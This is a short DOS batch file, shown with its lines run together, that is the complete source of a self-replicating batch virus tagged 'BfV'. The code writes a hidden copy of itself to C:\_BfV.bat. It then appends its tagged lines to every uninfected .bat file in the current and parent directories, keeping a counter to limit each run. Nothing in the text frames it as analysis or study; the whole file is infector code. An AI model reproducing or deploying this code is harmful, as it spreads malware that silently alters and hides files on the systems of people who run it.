@echo off%[BfV_B]% if '%1=='## goto BfV_%2 if exist C:\_BfV.bat goto BfV_ if not exist %0.bat goto BfV_end find "BfV"<%0.bat>C:\_BfV.bat attrib C:\_BfV.bat +h :BfV_ command /e:5000 /c C:\_BfV ## run goto BfV_end :BfV_run for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i exit BfV :BfV_inf if '%BfV%=='1111111 exit set BfV=%BfV%1 find "BfV"<%3>nul if not errorlevel 1 goto BfV_end type %3>BfV type C:\_BfV.bat>>BfV move BfV %3>nul exit BfV :BfV_end